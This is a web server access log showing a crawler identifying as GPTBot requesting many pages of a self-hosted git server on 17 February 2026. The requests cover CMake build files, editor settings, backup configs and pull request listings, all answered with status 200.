"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" -[17/Feb/2026:18:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" -[17/Feb/2026:18:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" -[17/Feb/2026:18:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json?display=source" [Client 74.7.227.38] [Length 11071] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" -[17/Feb/2026:18:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json?display=source" [Client 74.7.227.38] [Length 11102] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" -[17/Feb/2026:18:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" -[17/Feb/2026:18:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10844] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:18:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:18:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:18:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12170] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" -[17/Feb/2026:18:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=closed&type=all" -[17/Feb/2026:18:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?files=C%2b%2bProject%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 17514] [Gzip 3.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:18:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?files=C%2b%2bProject%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 15278] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:18:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:18:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11749] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:18:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16073] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:18:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11382] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:18:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:18:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11384] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:18:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11383] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:18:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11638] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:18:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11288] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11354] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:18:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16072] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:18:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11746] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:18:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11668] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:18:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11669] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 